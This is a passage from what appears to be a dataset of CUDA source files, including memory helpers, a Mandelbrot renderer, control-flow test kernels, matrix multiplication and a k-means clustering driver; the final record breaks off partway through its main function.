serial_no
int64
1
24.2k
cuda_source
stringlengths
11
9.01M
21,401
#include "utilities.cuh"

/*
 * Allocates `length` device buffers. array[i] is a host pointer to the
 * location that receives the i-th device pointer; size[i] is that buffer's
 * byte size.
 *
 * Bug fixed: the original fell through into its cleanup label on the
 * success path too, freeing every buffer it had just allocated, and it
 * passed the host slot (array[i]) instead of the device pointer
 * (*array[i]) to cudaFree. Cleanup now runs only on failure and rolls
 * back only the allocations that already succeeded.
 */
cudaError_t arrayMalloc(void*** array, int length, size_t* size)
{
    cudaError_t cudaStatus = cudaSuccess;
    for (int i = 0; i < length; i++) {
        cudaStatus = cudaMalloc(array[i], size[i]);
        if (cudaStatus != cudaSuccess) {
            fprintf(stderr, "cudaMalloc failed!\n");
            // Roll back the buffers allocated before the failure.
            for (int j = 0; j < i; j++) {
                cudaFree(*array[j]);
            }
            return cudaStatus;
        }
    }
    return cudaStatus;
}

/*
 * Copies `length` host buffers (*array_h[i]) into device buffers
 * (*array_d[i]), size[i] bytes each.
 * Bug fixed: the success path no longer falls through into the cleanup
 * code; the device buffers are released only when a copy fails.
 */
cudaError_t arraycpyHtoD(void*** array_d, void*** array_h, int length, size_t* size)
{
    cudaError_t cudaStatus = cudaSuccess;
    for (int i = 0; i < length; i++) {
        cudaStatus = cudaMemcpy(*array_d[i], *array_h[i], size[i], cudaMemcpyHostToDevice);
        if (cudaStatus != cudaSuccess) {
            fprintf(stderr, "cudaMemcpy HostToDevice of array %d failed!\n", i);
            fprintf(stderr, "Reasons for failure : %s\n", cudaGetErrorString(cudaStatus));
            for (int j = 0; j < length; j++) {
                cudaFree(*array_d[j]);
            }
            return cudaStatus;
        }
    }
    return cudaStatus;
}

/*
 * Variant of arraycpyHtoD whose host side is a flat array of buffers:
 * copies array_h[i] (host) into *array_d[i] (device), size[i] bytes each.
 * Same fall-through/cudaFree fixes as above.
 */
cudaError_t arraycpyHtoD_v2(void*** array_d, void** array_h, int length, size_t* size)
{
    cudaError_t cudaStatus = cudaSuccess;
    for (int i = 0; i < length; i++) {
        cudaStatus = cudaMemcpy(*array_d[i], array_h[i], size[i], cudaMemcpyHostToDevice);
        if (cudaStatus != cudaSuccess) {
            fprintf(stderr, "cudaMemcpy HostToDevice of array %d failed!\n", i);
            fprintf(stderr, "Reasons for failure : %s\n", cudaGetErrorString(cudaStatus));
            for (int j = 0; j < length; j++) {
                cudaFree(*array_d[j]);
            }
            return cudaStatus;
        }
    }
    return cudaStatus;
}

/*
 * Copies `length` device buffers (*array_d[i]) back into host buffers
 * (*array_h[i]), size[i] bytes each.
 * Bug fixed: on success the original freed the device buffers (fall
 * through) and on error it freed the host slot array_d[i] instead of the
 * device pointer *array_d[i].
 */
cudaError_t arraycpyDtoH(void*** array_h, void*** array_d, int length, size_t* size)
{
    cudaError_t cudaStatus = cudaSuccess;
    for (int i = 0; i < length; i++) {
        cudaStatus = cudaMemcpy(*array_h[i], *array_d[i], size[i], cudaMemcpyDeviceToHost);
        if (cudaStatus != cudaSuccess) {
            fprintf(stderr, "cudaMemcpy DeviceToHost of array %d failed!\n", i);
            for (int j = 0; j < length; j++) {
                cudaFree(*array_d[j]);
            }
            return cudaStatus;
        }
    }
    return cudaStatus;
}

/*
 * Variant of arraycpyDtoH whose host side is a flat array of buffers:
 * copies *array_d[i] (device) into array_h[i] (host), size[i] bytes each.
 * Same fall-through/cudaFree fixes as above.
 */
cudaError_t arraycpyDtoH_v2(void** array_h, void*** array_d, int length, size_t* size)
{
    cudaError_t cudaStatus = cudaSuccess;
    for (int i = 0; i < length; i++) {
        cudaStatus = cudaMemcpy(array_h[i], *array_d[i], size[i], cudaMemcpyDeviceToHost);
        if (cudaStatus != cudaSuccess) {
            fprintf(stderr, "cudaMemcpy DeviceToHost of array %d failed!\n", i);
            for (int j = 0; j < length; j++) {
                cudaFree(*array_d[j]);
            }
            return cudaStatus;
        }
    }
    return cudaStatus;
}

/*
 * Allocates one device buffer of `size` bytes into *a_d.
 * Bug fixed: the original called cudaMalloc((void**)&a_d, ...), writing
 * the new device pointer into the local parameter copy, so the caller's
 * pointer was never set and the allocation leaked.
 */
cudaError_t oneMalloc(void** a_d, size_t size)
{
    cudaError_t cudaStatus = cudaMalloc(a_d, size);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaMalloc failed!\n");
    }
    return cudaStatus;
}

/* Copies `size` bytes from host buffer `a` to device buffer `dev_a`. */
cudaError_t onecpyHtoD(void* dev_a, void* a, size_t size)
{
    cudaError_t cudaStatus = cudaMemcpy(dev_a, a, size, cudaMemcpyHostToDevice);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaMemcpy failed!\n");
    }
    return cudaStatus;
}

/* Copies `size` bytes from device buffer `dev_a` to host buffer `a`. */
cudaError_t onecpyDtoH(void* a, void* dev_a, size_t size)
{
    cudaError_t cudaStatus = cudaMemcpy(a, dev_a, size, cudaMemcpyDeviceToHost);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "one cudaMemcpy DtoH failed!\n");
    }
    return cudaStatus;
}

/* Selects device 0 for all subsequent CUDA calls on this host thread. */
cudaError_t oneSetdevice()
{
    cudaError_t cudaStatus = cudaSetDevice(0);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaSetDevice failed! Do you have a CUDA-capable GPU installed?\n");
    }
    return cudaStatus;
}

/* Returns (and clears) the last error raised by a kernel launch. */
cudaError_t oneLastError()
{
    cudaError_t cudaStatus = cudaGetLastError();
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus));
    }
    return cudaStatus;
}

// cudaDeviceSynchronize waits for the kernel to finish, and returns
// any errors encountered during the launch.
// Blocks until all previously launched device work has completed and
// reports any asynchronous error raised by that work.
cudaError_t oneCudaDeviceSync() {
    cudaError_t cudaStatus;
    cudaStatus = cudaDeviceSynchronize();
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus);
    }
    return cudaStatus;
}

using namespace std;

// Writes the M x N row-major matrix A to `filename` as whitespace-separated
// text: values within a row are separated by single spaces, rows by
// newlines, and the final row carries no trailing newline.
// NOTE(review): file.open() success is never checked — confirm callers
// always supply a writable path.
void write_array_to_file(double* A, string filename, int M, int N) {
    fstream file;
    file.open(filename, ios::out);
    for (int i = 0; i < M; i++) {
        if(i != M-1)
            // Interior rows: space between values, newline after the last.
            for (int j = 0; j < N; j++) {
                if (j != N - 1)
                    file << A[i * N + j] << ' ';
                else
                    file << A[i * N + j] << '\n';
            }
        else
            // Final row: identical, except no trailing newline.
            for (int j = 0; j < N; j++) {
                if (j != N - 1)
                    file << A[i * N + j] << ' ';
                else
                    file << A[i * N + j];
            }
    }
}

// Writes `size` doubles from A to `filename`, space-separated on one line.
// NOTE(review): fstream does not throw by default, so this catch block is
// effectively dead — stream failures are silently ignored.
void write_array_to_file_simple(double* A, string filename, int size) {
    fstream file;
    file.open(filename, ios::out);
    for (int i = 0; i < size; i++) {
        try {
            file << A[i] << ' ';
        }
        catch (...) {
            cout << filename << " writing error at element " << i << '/' << size << endl;
        }
    }
}

// vector<double> overload of write_array_to_file_simple; `size` is trusted
// by the caller to be <= A.size().
void write_array_to_file_simple_v(vector<double>& A, string filename, int size) {
    fstream file;
    file.open(filename, ios::out);
    for (int i = 0; i < size; i++) {
        try {
            file << A[i] << ' ';
        }
        catch (...) {
            cout << filename << " writing error at element " << i << '/' << size << endl;
        }
    }
}
21,402
# include <cuda.h>
# include <cuda_runtime.h>
# include <vector_types.h>
# include <device_launch_parameters.h>
# include <cstdio>
# ifdef WIN32
# include <time.h>
# else
# include <sys/time.h>
# endif

// Kernel: one thread per point (t_x, t_y) of an n x n grid covering the
// complex rectangle [-2, 0.5] x [-1.25, 1.25]; iterates z <- z^2 + c until
// |z|^2 >= 4 or niterMax iterations, and stores the iteration count in
// mandel[t_x + t_y*n]. Threads outside the n x n grid do nothing.
__global__ void iterMandel(int niterMax, int n, int* mandel )
{
    int t_x, t_y, iter;
    float step, zr;
    float2 z0,c0;
    iter = 0;
    t_x = threadIdx.x+blockIdx.x*blockDim.x;
    t_y = threadIdx.y+blockIdx.y*blockDim.y;
    if ((t_x<n) && (t_y<n)) {
        step = 2.5f/(n-1.f);
        c0.x = -2.00 + step*t_x;   // NOTE(review): double literals promote the math
        c0.y = -1.25 + step*t_y;
        z0 = c0;
        while ((z0.x*z0.x+z0.y*z0.y < 4.f)&&(iter<niterMax)) {
            iter += 1;
            zr = z0.x*z0.x-z0.y*z0.y+c0.x;   // real part of z^2 + c
            z0.y = 2.f*z0.x*z0.y+c0.y;       // imaginary part of z^2 + c
            z0.x = zr;
        }
        mandel[t_x+t_y*n] = iter;
    }
}

/* Small routine returning an instant in seconds. Taking the difference of
   two instants measures the time spent in a routine; precision is on the
   order of a microsecond. (translated from French) */
float topChrono()
{
# ifdef WIN32
    clock_t chrono;
    chrono = clock();
    return ((float)chrono)/CLOCKS_PER_SEC;
# else
    struct timeval tv;
    gettimeofday(&tv,NULL);
    return tv.tv_sec+1.E-6*tv.tv_usec;
# endif
}

/* Computes the coordinates of the grid vertices. (translated from French)
   Allocates xh/yh with new[]; the caller owns and must delete[] them. */
void compGrid(int n, float*& xh, float*& yh)
{
    xh = new float[n];
    yh = new float[n];
    float step = 2.5/(n-1.);
    for (int i = 0; i < n; i++) {
        xh[i] = -2.+i*step;
        yh[i] = -1.25+i*step;
    }
}

/* Saves the Mandelbrot set in Gnuplot format. (translated from French)
   NOTE(review): fopen() result is not checked before use. */
void saveMandel(int n, const float* xh, const float* yh, const int* mandel)
{
    FILE* fich = fopen("Mandel.dat", "w");
    for (int j = 0; j < n; j++) {
        for (int i = 0; i < n; i++) {
            fprintf(fich,"%f\t%f\t%d\n",yh[i], xh[j], mandel[i*n+j]);
        }
        fprintf(fich, "\n");   // blank line separates gnuplot scan lines
    }
    fclose(fich);
}

// Entry point. Optional argv[1] = grid size n, argv[2] = max iterations.
// Times kernel + result copy with CUDA events and saves the set to disk.
int main(int nargc, char* argv[])
{
    float t1,t2;              // NOTE(review): unused
    float *xh, *yh;
    int n = 1280;
    int maxIter = 1000;
    int* gmandel, *cmandel;   // device / host result buffers
    cudaEvent_t start, stop;
    float time;
    if (nargc > 1) n = atoi(argv[1]);
    if (nargc > 2) maxIter = atoi(argv[2]);
    compGrid(n,xh,yh);
    cudaMalloc((void**)&gmandel, n*n*sizeof(int));   // NOTE(review): unchecked
    cmandel = new int[n*n];
    cudaEventCreate(&start);
    cudaEventCreate(&stop);
    dim3 blockDim(16,16);
    dim3 gridDim((n+15)/16, (n+15)/16);   // ceil-div so the grid covers n x n
    cudaEventRecord( start, 0 );
    iterMandel<<<gridDim,blockDim>>>(maxIter, n, gmandel);
    // The blocking D2H copy synchronizes, so the timed span covers the kernel.
    cudaMemcpy(cmandel, gmandel, n*n*sizeof(int), cudaMemcpyDeviceToHost);
    cudaEventRecord( stop, 0 );
    cudaEventSynchronize( stop );
    cudaFree(gmandel);
    cudaEventElapsedTime( &time, start, stop );   // milliseconds
    cudaEventDestroy( start );
    cudaEventDestroy( stop );
    printf("Temps de calcul du Bouddha : %f secondes\n",time/1000.);
    saveMandel(n,xh,yh,cmandel);
    delete [] cmandel;
    delete [] xh;
    delete [] yh;
    return EXIT_SUCCESS;
};
21,403
/* \file TestExceptions.cu \author Gregory Diamos <gregory.diamos@gatech.edu> \date Tuesday November 9, 2010 \brief A CUDA assembly test for unstructured control flow mimicking exceptions. */
#include <cstdlib>

// One block of `threads` threads; `iterations` rounds of result mixing.
const unsigned int threads = 512;
const unsigned int iterations = 100;

// Device-global result/input buffers, one slot per thread.
__device__ unsigned int output[threads];
__device__ unsigned int input[threads];

// Mimics try/catch around a divergent function call with explicit gotos
// (intentionally unstructured control flow). Thread `id` takes the
// Function_1 path, all others Function_2; a "throw" jumps to Catch_Label,
// which records (unsigned int)-1 in output.
extern "C" __global__ void exception_in_divergent_call(unsigned int id)
{
    goto Try_Label;
Try_Label:
    unsigned int result = 0;
    if(threadIdx.x == id)
    {
        goto Function_1_Begin;
    }
    else
    {
        goto Function_2_Begin;
    }
Function_1_Begin:
    if(input[threadIdx.x] != id) goto Catch_Label;   // "throw"
    result = input[threadIdx.x];
    goto Function_Return;
Function_2_Begin:
    if(input[threadIdx.x] == id) goto Catch_Label;   // "throw"
    result = threadIdx.x;
    goto Function_Return;
Function_Return:
    // Mixing loop so the compiler cannot trivially collapse the paths.
    for(unsigned int i = 0; i < iterations; ++i)
    {
        result = (result >> 1) ^ threadIdx.x;
    }
    output[threadIdx.x] = result;
    return;
Catch_Label:
    output[threadIdx.x] = (unsigned int)-1; // error occurred
    return;
}

// Mimics an exception thrown from inside a loop: the prefix-sum loop
// "throws" (jumps to Catch_Label) when an input exceeds blockDim.x.
// NOTE(review): the `int iterations` parameter shadows the global constant
// of the same name — confirm intended.
extern "C" __global__ void exception_in_loop(int iterations)
{
    goto Try_Label;
Try_Label:
    unsigned int result = 0;
    goto Function_Begin;
Function_Begin:
    for(unsigned int i = 0; i < threadIdx.x; ++i)
    {
        if(input[i] > blockDim.x) goto Catch_Label;   // "throw"
        result += input[i];
    }
    for(unsigned int i = 0; i < iterations; ++i)
    {
        result = (result >> 1) ^ threadIdx.x;
    }
    goto Function_Return;
Function_Return:
    output[threadIdx.x] = result;
    return;
Catch_Label:
    output[threadIdx.x] = (unsigned int)-1; // error occurred
    return;
}

// Mimics an exception thrown from inside a nested conditional.
extern "C" __global__ void exception_in_conditional()
{
    goto Try_Label;
Try_Label:
    unsigned int result = 0;
    goto Function_Begin;
Function_Begin:
    if(input[threadIdx.x] > 0)
    {
        if(input[threadIdx.x] > blockDim.x) goto Catch_Label;   // "throw"
        result = input[threadIdx.x];
    }
    for(unsigned int i = 0; i < iterations; ++i)
    {
        result = (result >> 1) + threadIdx.x;
    }
    goto Function_Return;
Function_Return:
    output[threadIdx.x] = result;
    return;
Catch_Label:
    output[threadIdx.x] = (unsigned int)-1; // error occurred
    return;
}

// Driver: seeds `input` three ways and launches each kernel once.
// NOTE(review): the string-name form of cudaGetSymbolAddress used here was
// removed in CUDA 5.0 — modern toolkits require passing the symbol itself.
// NOTE(review): no error checking or device synchronization; results in
// `output` are never copied back or verified.
int main(int argc, char** argv)
{
    unsigned int* in;
    srand(0);
    cudaGetSymbolAddress((void**)&in, "input");
    unsigned int refIn[threads];
    // Case 1: input[i] == i, so only thread `id` (0) survives Function_1.
    for(unsigned int i = 0; i < threads; i++)
    {
        refIn[i] = i;
    }
    cudaMemcpy(in, refIn, threads * sizeof(unsigned int), cudaMemcpyHostToDevice);
    exception_in_divergent_call<<<1, threads>>>(0);
    // Case 2: random values in [0, threads) for the loop test.
    for(unsigned int i = 0; i < threads; i++)
    {
        refIn[i] = std::rand() % threads;
    }
    cudaMemcpy(in, refIn, threads * sizeof(unsigned int), cudaMemcpyHostToDevice);
    exception_in_loop<<<1, threads>>>(iterations);
    // Case 3: random 0/1 values for the conditional test.
    for(unsigned int i = 0; i < threads; i++)
    {
        refIn[i] = std::rand() & 1;
    }
    cudaMemcpy(in, refIn, threads * sizeof(unsigned int), cudaMemcpyHostToDevice);
    exception_in_conditional<<<1, threads>>>();
}
21,404
/* * File: Histogram * Author: Roberts Slisans * Date: 03/24/2015 16:00 * Last updated: 03/24/2014 17:32 */
#include <stdio.h>
#include <assert.h>

/**
 * KERNEL cuAdd() - Takes 2 input arrays of same size N and adds them into C.
 * Locations are found by computing the global index of each thread.
 * @return
 */
__global__ void cuAdd(int *a,int *b,int *c, int N)
{
    // 1D global index
    int offset = blockDim.x * blockIdx.x + threadIdx.x;
    if(offset < N)
    {
        c[offset] = a[offset] + b[offset];
    }
}

/**
 * KERNEL cuMult() - Takes two 2D matrices and multiplies them
 * @param a - 1st Matrix
 * @param b - 2nd Matrix
 * @param c - Result Matrix
 * @param wA - length of A and depth of B
 * @param wB - length of matrix B and C
 * @param hA - depth of matrix A and C
 */
__global__ void cuMult(int *a, int *b, int *c, int wA, int wB, int hA)
{
    // global index
    int gidx = blockDim.x * blockIdx.x + threadIdx.x; // col
    int gidy = blockDim.y * blockIdx.y + threadIdx.y; // row
    if(gidx < wB && gidy < hA)
    {
        int sum = 0;
        for(int k=0; k<wA; k++)
        {
            // Multiply row of A by column of B
            sum += a[gidy*wA + k] * b[k*wB +gidx];
        }
        c[gidy * wB + gidx] = sum;
    }
}

/**
 * KERNEL cuMultOpti() - Takes two 2D matrices and multiplies them optimally
 * @param a - 1st Matrix
 * @param b - 2nd Matrix
 * @param c - Result Matrix
 * @param wA - length of A and depth of B
 * @param wB - length of matrix B and C
 * @param hA - depth of matrix A and C
 *
 * NOTE(review): this kernel is broken and is not called by main (the launch
 * is commented out there): it loads only ONE 16x16 tile but the product
 * loop runs k over [0, wA), reading aBlock[threadIdx.y][k] out of bounds
 * whenever wA > 16; the tile is also stored transposed relative to how it
 * is read, and the global loads have no bounds guard. A correct version
 * must loop over wA/16 tiles with a __syncthreads() per tile.
 */
__global__ void cuMultOpti( int *a, int *b, int *c, int wA, int wB, int hA)
{
    #define blockTile 16
    /* Blocksize is 16x16 */
    /* Allocate shared memory */
    __shared__ int aBlock[blockTile][blockTile];
    __shared__ int bBlock[blockTile][blockTile];
    /* Calculate global index X, Y*/
    int gidx = blockDim.x * blockIdx.x + threadIdx.x; // column
    int gidy = blockDim.y * blockIdx.y + threadIdx.y; // row
    /* Assign shared memory and sync */
    /* Warning, wA*gidy may be out of bounds */
    aBlock[threadIdx.x][threadIdx.y] = a[gidy*wA + threadIdx.x];
    bBlock[threadIdx.x][threadIdx.y] = b[threadIdx.y*wB + gidx];
    /* Make sure all of the threads have cached the memory */
    __syncthreads();
    /* Check if global IDs are within limits */
    if(gidx < wB && gidy < hA)
    {
        int sum = 0;
        for(int k=0; k<wA; k++)
        {
            sum += aBlock[threadIdx.y][k] * bBlock[k][threadIdx.x];
        }
        // c [gidy][gidx]
        c[gidy * wB + gidx] = sum;
    }
}

/**
 * HOST h_MatrixMult_Naive() - Takes two 2D matrices and multiplies them naively
 * @param a wA.hA - 1st Matrix
 * @param b wB.wA - 2nd Matrix
 * @param c hA.wB - Result Matrix
 * @param wA - length of A and depth of B
 * @param wB - length of matrix B and C
 * @param hA - depth of matrix A and C
 */
void h_MatrixMult_Naive( int *a, int *b, int *c, int wA, int wB, int hA)
{
    // Iterate through all rows of a
    for(int i=0; i<hA; i++)
    {
        // Iterate through all columns of b
        for(int j=0; j<wB; j++)
        {
            // Calculate all of c[i][j] products
            int sum = 0;
            for(int k=0; k<wA; k++)
            {
                sum += a[i*wA + k] * b[k*wB + j];
            }
            assert(i*wB + j < hA*wB);
            // Index - row i of column j with column width of wB
            c[i * wB + j] = sum;
        }
    }
}

/**
 * ENTRY main() - Tests <<<>>>cuMult() kernel: Initializes memory and data on
 * the host, then memory on the device. Copies the data from host to device,
 * executes kernel with memory device pointers, copies result back to host,
 * displays results for error checking and frees allocated memory.
 * @return
 */
int main(int argc, char ** argv)
{
    // Default problem dimensions and fill values.
    // width A
    int wA = 320;
    // height A
    int hA = 640;
    // width B
    int wB = 320;
    // height B
    int hB = wA;
    // value A
    int aValue = 1;
    // value B
    int bValue = 2;
    /* Fetch the test parameters */
    if(argc < 6)
    {
        printf("Using default parameters: 320 640 320 1 2\n");
    }
    else
    {
        wA = atoi(argv[1]);
        hA = atoi(argv[2]);
        wB = atoi(argv[3]);
        hB = wA;
        aValue = atoi(argv[4]);
        bValue = atoi(argv[5]);
    }
    /**
     * Neutral - both for host and device
     */
    int wC = wB;
    int hC = hA;
    size_t size_a = sizeof(int) * wA * hA;
    size_t size_b = sizeof(int) * wB * hB;
    size_t size_c = sizeof(int) * wC * hC;
    // host
    // NOTE(review): only hh_c is null-checked; a, b, c are used unchecked.
    int *a, *b, *c, *hh_c;
    a = (int *) malloc(size_a);
    b = (int *) malloc(size_b);
    c = (int *) malloc(size_c);
    /* Host test memory */
    hh_c = (int *) malloc(size_c);
    assert(hh_c != NULL);
    /**
     * Device specific
     */
    // device
    // NOTE(review): cudaMalloc/cudaMemcpy/kernel launch results unchecked.
    int *_a, *_b, *_c;
    cudaMalloc( (void **) &_a, size_a );
    cudaMalloc( (void **) &_b, size_b );
    cudaMalloc( (void **) &_c, size_c );
    /** Neutral */
    // initialize A
    for(int i=0; i < hA * wA; i++)
    {
        a[i] = aValue;
    }
    // initialize B
    for(int i=0; i < hB * wB; i++)
    {
        b[i] = bValue;
    }
    /** Device*/
    // copy data to GPU
    cudaMemcpy(_a, a, size_a, cudaMemcpyHostToDevice);
    cudaMemcpy(_b, b, size_b, cudaMemcpyHostToDevice);
    // x : col , y: row
    dim3 blockSize(16,16);
    // (N.x + blockSize.x - 1)/blockSize.x, (N.y + blockSize.y -1)/blockSize.y)
    dim3 gridSize((wC+15)/16, (hC+15)/16);
    // kernel execution
    cuMult<<< gridSize, blockSize >>>(_a, _b, _c, wA, wB, hA);
    //cuMultOpti<<< gridSize, blockSize >>>(_a, _b, _c, wA, wB, hA);
    // copy data back to CPU (blocking copy also synchronizes with the kernel)
    cudaMemcpy(c, _c, size_c, cudaMemcpyDeviceToHost);
    // compare with cpu results
    /** Host*/
    h_MatrixMult_Naive(a, b, hh_c, wA, wB, hA);
    // Check first and last memory location
    // NOTE(review): the "Start" value printed is c[2], not c[0].
    printf("Start: %d. Finish: %d.\n",c[2], c[wC * hC - 1]);
    /* Check */
    // Naive check
    // NOTE(review): with constant-valued inputs every element of c is equal,
    // so this loop walks past the end of the array (out-of-bounds read)
    // before finding a mismatch.
    int k = 0;
    while(c[k] == c[k+1]) k++;
    printf("EQ Test: Breakpoint @ %d\n",k);
    // Device - Host check
    // NOTE(review): same unbounded-walk concern when device and host agree
    // on every element.
    k = 0;
    while(c[k] == hh_c[k]) k++;
    printf("H2D Test: Breakpoint @ %d\n",k);
    // release resources
    cudaFree(_a);
    cudaFree(_b);
    cudaFree(_c);
    free(a);
    free(b);
    free(c);
    free(hh_c);
    return 0;
}
21,405
#include "includes.h"

// Element-wise exponential of a cr x cc row-major matrix:
// c[row][col] = exp(a[row][col]). Launched on a 2-D grid, one thread per
// element; threads outside the matrix exit immediately.
__global__ void matrixExp(double *a, double *c, int cr, int cc){
    const int col = blockIdx.x * blockDim.x + threadIdx.x; // column index
    const int row = blockIdx.y * blockDim.y + threadIdx.y; // row index
    if (col >= cc || row >= cr)
        return; // grid tail: nothing to do
    const int idx = row * cc + col;
    c[idx] = exp(a[idx]);
}
21,406
#include "includes.h"

// Backprop for a row-wise max: scatters the output gradient of each row
// into the input slot that produced the max. indices holds 1-based max
// positions (stored as floats); one thread per row, rows >= nrows exit.
__global__ void max_gradInput(float *input, float *output, float *indices, long nrows, long ncols)
{
    const long row = threadIdx.x + blockDim.x * blockIdx.x; // one row per thread
    if (row >= nrows)
        return;
    const long rowStart = row * ncols;          // first element of this row
    const long maxPos = indices[row] - 1;       // convert 1-based float index to 0-based
    input[rowStart + maxPos] = output[row];     // route gradient to the argmax slot
}
21,407
#include<iostream>
#include<string>
#include<malloc.h>
#include<fstream>
#include<sstream>
#include<vector>
#include<cmath>
#include<cstdio>
#include<stdlib.h>
#include<cuda.h>
#include<cuda_runtime.h>

#define MAX_CLUSTER_SIZE 6
#define BLOCK_SIZE 16

using namespace std;

// A record is one CSV row; the data set is the list of all rows.
typedef vector<double> record_t;
typedef vector<record_t> data_t;

long long int max_atoms=0;          // atoms per conformation (detected from the file)
long long int max_energy_states=0;  // number of conformations in the file
int k_clus,cls;                     // cls: cluster id chosen in the host E-step
double cluster_lambda=0.0;
int f=0;                            // convergence flag for the (disabled) M-step

// Parses one comma-separated line from `ins` into `record` as doubles.
istream& operator >>(istream& ins, record_t &record)
{
    record.clear();
    string line;
    getline(ins,line);
    stringstream ss(line);
    string field;
    while(getline(ss,field,','))
    {
        stringstream fs(field);
        double d=0.0;
        fs>>d;
        record.push_back(d);
    }
    return ins;
}

// Reads every line of the stream into `data`, one record per line.
istream& operator >> (istream& ins, data_t& data)
{
    data.clear();
    record_t record;
    while(ins>>record)
    {
        data.push_back(record);
    }
    return ins;
}

// E-step kernel: thread i assigns conformation i to the nearest cluster,
// writing the 1-based cluster id into rnk[i]. The distance is the sum over
// atoms of the Euclidean distance of the 3 coordinates (columns 2..4).
// NOTE(review): the seed value `min` is computed from instance[(j*5)+k+2],
// i.e. conformation 0 regardless of i — this mirrors the host loop below,
// but confirm it is intended and not a missing i term.
__global__ void findMeans(const float *cluster, const float *instance, int *rnk, const int num, const int clus_size, const int maxAtoms)
{
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    // int i = threadIdx.x;
    if(i<num)
    {
        // Seed with the distance to cluster 0.
        float min=0.0;
        for(int j=0;j<maxAtoms;j++)
        {
            float d=0.0;
            float s=0.0;
            for(int k=0;k<3;k++)
            {
                d=instance[(j*5)+k+2]-cluster[((0*clus_size)+j)*maxAtoms +k];
                s=s+(d*d);
            }
            s=sqrt(s);
            min+=s;
        }
        // Scan all clusters, keeping the closest (ties go to the later one).
        int cls=-1;
        for(int clus=0;clus<clus_size;clus++)
        {
            float val=0.0;
            for(int p=0;p<maxAtoms;p++)
            {
                float d=0.0;
                float s=0.0;
                for(int l=0;l<3;l++)
                {
                    d=instance[((i*maxAtoms+p)*5)+l+2]-cluster[((clus*clus_size)+p)*maxAtoms +l];
                    s=s+(d*d);
                }
                s=sqrt(s);
                val+=s;
            }
            if(val<=min)
            {
                cls=clus;
                min=val;
            }
        }
        rnk[i]=cls+1;   // 1-based cluster id (0 means "no cluster beat the seed")
    }
}

// Driver: loads alanine.csv, seeds clusters from random conformations,
// runs the GPU E-step and an equivalent CPU E-step, and compares the two
// assignments. The M-step / iteration loop is present but commented out.
int main(void)
{
    // NOTE(review): `err` is checked after cudaMalloc/cudaMemcpy for d_clus
    // below but never assigned from them — those checks test a stale value.
    cudaError_t err=cudaSuccess;
    data_t data;
    ifstream infile("alanine.csv");
    infile>>data;
    if(!infile.eof())
    {
        cout<<"Error! Please check file.\n";
        return 1;
    }
    infile.close();
    cout<<"Number of rows in file : "<<data.size()<<endl;
    // Atoms per conformation: first row whose column-1 value drops below
    // its predecessor starts the second conformation.
    for(long long int i=0;i<data.size();i++)
    {
        if(i>0)
        {
            if(data[i][1]<data[i-1][1])
            {
                max_atoms=i;
                break;
            }
        }
    }
    cout<<"Number of atoms : "<<max_atoms<<endl;
    max_energy_states=data[data.size()-1][0];   // last row's column 0 = conformation count
    // max_energy_states=32;
    cout<<"Total number of conformations : "<<max_energy_states<<endl;
    //allocate host cluster
    int s = MAX_CLUSTER_SIZE*max_atoms*3;
    size_t sz = s*sizeof(float);
    float *host_cluster=(float *)malloc(sz);
    if(host_cluster==NULL) cout<<"Not able to allocate host cluster"<<endl;
    //Initializing host cluster: seed each cluster with a random conformation.
    // NOTE(review): the flattening ((i*MAX_CLUSTER_SIZE)+ii)*max_atoms+jj
    // does not match a [cluster][atom][coord] layout of extent
    // MAX_CLUSTER_SIZE x max_atoms x 3 (that would be (i*max_atoms+ii)*3+jj);
    // the kernel uses the same expression, so the two agree, but confirm.
    for(int i=0;i<MAX_CLUSTER_SIZE;i++)
    {
        int clus_num=rand()%max_energy_states + 0;
        for(long long int ii=0;ii<max_atoms;ii++)
        {
            for(int jj=0;jj<3;jj++)
            {
                host_cluster[((i*MAX_CLUSTER_SIZE)+ii)*max_atoms+jj]=data[clus_num*max_atoms+ii][jj+2];
            }
        }
    }
    //allocate device cluster
    float *d_clus = NULL;
    cudaMalloc((void **)&d_clus, sz);
    if(err!=cudaSuccess)
    {
        cout<<"Failed to allocate cluster on device!\n";
        exit(EXIT_FAILURE);
    }
    //initializing device cluster
    cudaMemcpy(d_clus, host_cluster, sz, cudaMemcpyHostToDevice);
    if(err!=cudaSuccess)
    {
        cout<<"Failed to copy cluster to device\n";
        exit(EXIT_FAILURE);
    }
    //allocate host instance: all rows flattened, 5 columns per row.
    float *host_instances;
    long int row=data.size();
    int col=5;
    long int size=row*col;
    host_instances=new float[size];
    for(long long int i=0;i<row;i++)
    {
        for(int j=0;j<col;j++)
        {
            host_instances[i*col+j]=data[i][j];
        }
    }
    //allocate device instance
    float *device_instances;
    err=cudaMalloc((void **)&device_instances,size*sizeof(float));
    if(err!=cudaSuccess)
    {
        cout<<"error allocating device instance"<<endl;
        exit(EXIT_FAILURE);
    }
    err=cudaMemcpy(device_instances, host_instances, size*sizeof(float), cudaMemcpyHostToDevice);
    if(err!=cudaSuccess)
    {
        cout<<"error copying device instance"<<endl;
        exit(EXIT_FAILURE);
    }
    // rnk: CPU-computed assignments; rnk_host: assignments copied from GPU.
    // NOTE(review): `int rnk[max_energy_states]` is a variable-length array
    // (non-standard C++) sized by a long long — large inputs overflow the stack.
    int *rnk_host;
    int rnk[max_energy_states];
    rnk_host=new int[max_energy_states];
    for(long long int i=0;i<max_energy_states;i++)
    {
        rnk_host[i]=0;
        rnk[i]=0;
    }
    int *rnk_device;
    err=cudaMalloc((void **)&rnk_device,max_energy_states*sizeof(int));
    if(err!=cudaSuccess)
    {
        cout<<"error allocating device rnk"<<endl;
        exit(EXIT_FAILURE);
    }
    err=cudaMemcpy(rnk_device, rnk_host, max_energy_states*sizeof(int), cudaMemcpyHostToDevice);
    if(err!=cudaSuccess)
    {
        cout<<"error allocating device instance"<<endl;
        exit(EXIT_FAILURE);
    }
    // dim3 dimBlock(BLOCK_SIZE,BLOCK_SIZE);
    // NOTE(review): num_blocks is computed but the launch below uses a fixed
    // <<<48,256>>> = 12288 threads — conformations beyond that are skipped.
    int num_blocks=(max_energy_states+511)/512;
    //while(1)
    //{
